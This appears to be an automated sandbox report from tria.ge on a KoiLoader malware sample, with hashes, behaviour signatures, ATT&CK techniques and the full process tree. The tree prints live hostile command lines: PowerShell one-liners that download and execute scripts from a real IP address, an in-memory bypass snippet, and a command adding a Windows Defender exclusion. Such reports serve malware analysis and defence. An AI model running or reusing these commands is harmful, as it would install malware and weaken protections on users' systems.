Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
98s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30/11/2024, 03:21
Static task
static1
Behavioral task
behavioral1
Sample
e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe
Resource
win7-20240903-en
General
-
Target
e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe
-
Size
2.2MB
-
MD5
5cb042f9877f5876a19c86ded15fb1f8
-
SHA1
12249b4e9e8f5a3d66259d9172f8b6d4225812ab
-
SHA256
e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819
-
SHA512
f6c4c9198de1d3a18815db38e50f36f7f73103a050f07c73ad83e05371a7a13be985a84c437ce27a74638d96fffda1eb860fa3b7923e47d020a3912cecd3f490
-
SSDEEP
49152:FBuZrEUcH4ytTJpIbxrvfqKIy029s4C1eH9K:jkLcH4ytItfgt29s4C1eH9K
Malware Config
Extracted
http://79.124.78.109/wp-includes/phyllopodan7V7GD.php
http://79.124.78.109/wp-includes/barasinghaby.ps1
Extracted
koiloader
http://79.124.78.109/flocking.php
Signatures
-
Koiloader family
-
Detects KoiLoader payload 1 IoCs
resource yara_rule behavioral2/memory/5112-53-0x00000000073A0000-0x00000000073AD000-memory.dmp family_koi_loader -
Blocklisted process makes network request 5 IoCs
flow pid Process 8 3228 powershell.exe 17 5112 powershell.exe 18 5112 powershell.exe 19 3100 powershell.exe 47 5112 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4128 powershell.exe 3228 powershell.exe 3100 powershell.exe 5112 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 1 IoCs
pid Process 320 e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3228 powershell.exe 3228 powershell.exe 5112 powershell.exe 5112 powershell.exe 4128 powershell.exe 4128 powershell.exe 3100 powershell.exe 3100 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3228 powershell.exe Token: SeDebugPrivilege 5112 powershell.exe Token: SeDebugPrivilege 4128 powershell.exe Token: SeDebugPrivilege 3100 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 3468 wrote to memory of 320 3468 e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe 82 PID 3468 wrote to memory of 320 3468 e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe 82 PID 3468 wrote to memory of 320 3468 e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe 82 PID 320 wrote to memory of 3228 320 e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp 83 PID 320 wrote to memory of 3228 320 e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp 83 PID 3228 wrote to memory of 2692 3228 powershell.exe 85 PID 3228 wrote to memory of 2692 3228 powershell.exe 85 PID 2692 wrote to memory of 5112 2692 wscript.exe 87 PID 2692 wrote to memory of 5112 2692 wscript.exe 87 PID 2692 wrote to memory of 5112 2692 wscript.exe 87 PID 3816 wrote to memory of 3504 3816 DllHost.exe 90 PID 3816 wrote to memory of 3504 3816 DllHost.exe 90 PID 3816 wrote to memory of 3504 3816 DllHost.exe 90 PID 3504 wrote to memory of 4128 3504 cmd.exe 92 PID 3504 wrote to memory of 4128 3504 cmd.exe 92 PID 3504 wrote to memory of 4128 3504 cmd.exe 92 PID 5112 wrote to memory of 3976 5112 powershell.exe 93 PID 5112 wrote to memory of 3976 5112 powershell.exe 93 PID 5112 wrote to memory of 3976 5112 powershell.exe 93 PID 3976 wrote to memory of 3100 3976 cmd.exe 95 PID 3976 wrote to memory of 3100 3976 cmd.exe 95 PID 3976 wrote to memory of 3100 3976 cmd.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe"C:\Users\Admin\AppData\Local\Temp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Users\Admin\AppData\Local\Temp\is-8S7QB.tmp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp"C:\Users\Admin\AppData\Local\Temp\is-8S7QB.tmp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp" /SL5="$8029E,1414311,832512,C:\Users\Admin\AppData\Local\Temp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" -command IWR -UseBasicParsing -Uri 'http://79.124.78.109/wp-includes/neocolonialXAW.php' -OutFile ($env:temp+'\vqPM0l4stR.js'); wscript ($env:temp+'\vqPM0l4stR.js');3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\vqPM0l4stR.js4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'http://79.124.78.109/wp-includes/phyllopodan7V7GD.php'; $l2 = 'http://79.124.78.109/wp-includes/barasinghaby.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z8IWGWWVNMV'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/sd2.ps1')"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/sd2.ps1')7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3100
-
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4128
-
-
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3r.js"1⤵PID:3364
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3r.js"1⤵PID:4116
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
420B
MD51b9ba97d604d5c3480706db052a7abd9
SHA1422e1cce641c713b830110e1dc6d550c030d87a0
SHA2561c5d6db4d880445791b9983f0826de1c4720776a670ca15bb527f4c93d45fab7
SHA5129f685353d73c462bb387e7f09a4fccfbe91b65aa4a2026089656ae4d36927b2acf412ecf477d5e97b1dcdf932eca502f5cf997b279b916edf1faafcf492b5ae8
-
Filesize
1KB
MD50f6a3762a04bbb03336fb66a040afb97
SHA10a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA25636e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\is-8S7QB.tmp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp
Filesize3.1MB
MD575ff4b69506691689c816c05782e97e7
SHA1232ca459d1a83d8794ee30c96422a77739a57ad4
SHA256f5416883c1a43a0b96e48c1da17d38c586f8d6a9b7d9978845e119df4c98f76f
SHA5123c0e0d41d899f19933aabc0a8f86ce9b9c4d1ea6bdac74f07ee95792be6bcbb7b9b4ce0c2fe148024077a28287b742971ad788f5c08b3e90d47099e1664b06bc
-
Filesize
1KB
MD56b99a6fb6c5e9457e130ea67228f825f
SHA130d89060b5f9ee665ab4ba5f645a8a560703e613
SHA2560a2f7577b81d9c87cb18acf5c022bbd5e811863427796481669d0413ed602b5d
SHA5127098afed5a19afd16801e2e22f49414d33bf605004a91fa3d9a7c1a7fb0722b20e48833166101ba9aa899dc9bfc991eb02078d927d1cb6696a8967c1b0f4f70d